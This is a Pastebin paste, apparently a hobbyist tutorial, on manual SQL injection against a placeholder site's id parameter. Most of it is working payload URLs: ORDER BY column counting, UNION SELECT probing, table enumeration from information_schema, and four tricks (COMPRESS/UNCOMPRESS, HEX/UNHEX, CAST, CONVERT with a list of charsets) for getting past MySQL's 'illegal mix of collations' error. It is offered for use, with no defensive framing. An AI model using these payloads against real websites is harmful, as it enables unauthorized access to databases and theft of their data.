API tools faq
paste
Advertisement
Kyfx

SQl n00b faster mind manual inject help

Kyfx
Jun 24th, 2015
511
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
raw download clone embed print report
  1. Bypassing illegal Mix of Collations- Tutorial
  2. By mind injector
  3. Only 4 no0b like me
  4. In this Tutorial You Will Learn How to Bypass illegal Mix of Collations.
  5. Lets start with our Regular SQL injection.
  6. Our Target.
  7. http://www.Site.com/detail.php?id=31
  8. First we have to Count How Many Columns it have.
  9. http://www.Site.com/detail.php?id=31 order by 1-- -
  10. No Error !
  11. http://www.Site.com/detail.php?id=31 order by 4-- -
  12. No Error !
  13. http://www.Site.com/detail.php?id=31 order by 6-- -
  14. We Got Error Here.
  15. Unknown Column '6' in 'order by'
  16. Lets Reduce the Column Count.
  17. http://www.Site.com/detail.php?id=31 order by 5-- -
  18. No Error !
  19. There are 5 Columns so let's Prepare our UNION SELECT Command and Find Vulnerable Columns.
  20. http://www.Site.com/detail.php?id=31 and 0 Union Select 1,2,3,4,5-- -
  21. We Got 2 and 3.
  22. Lets try to Get The Tables.
  23. http://www.Site.com/detail.php?id=31 and 0 Union Select 1,concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -
  24. Ooops !! we got Error Here .
  25. Illegal mix of collations for operation 'UNION'
  26. Here Some Methods which we can use to Bypass illegal mix of collations for operation 'UNION'
  27. .1 Using UNCOMPRESS(COMPRESS(our_query_here))
  28. http://www.Site.com/detail.php?id=31 and 0 Union Select 1,uncompress(compress(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
  29. BYPASSED !!
  30. .2 Using UNHEX(HEX(our_query_here))
  31. http://www.Site.com/detail.php?id=31 and 0 Union Select 1,unhex(hex(concat(table_name))),3,4,5 from information_schema.tables where table_schema=database()-- -
  32. BYPASSED !!
  33. .3 Using CAST()
  34. http://www.Site.com/detail.php?id=31 and 0 Union Select 1,cast(table_name as binary),3,4,5 from information_schema.tables where table_schema=database()-- -
  35. BYPASSED !!
  36. .4 Using CONVERT()
  37. http://www.Site.com/detail.php?id=31 and 0 Union Select 1,convert(table_name using ascii),3,4,5 from information_schema.tables where table_schema=database()-- -
  38. BYPASSED !!
  39. SOME ADVANCE Methods for CONVERT()
  40. In CONVERT() Function if ascii doesn't work then we can use these Functions instead of ascii.
  41. ujis
  42. ucs2
  43. tis620
  44. swe7
  45. sjis
  46. macroman
  47. macce
  48. latin7
  49. latin5
  50. latin2
  51. koi8u
  52. koi8r
  53. keybcs2
  54. hp8
  55. geostd8
  56. gbk
  57. gb2132
  58. armscii8
  59. ascii
  60. cp1250
  61. big5
  62. cp1251
  63. cp1256
  64. cp1257
  65. cp850
  66. cp852
  67. cp866
  68. cp932
  69. dec8
  70. euckr
  71. latin1
  72. Hope it Will Help you in Future
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!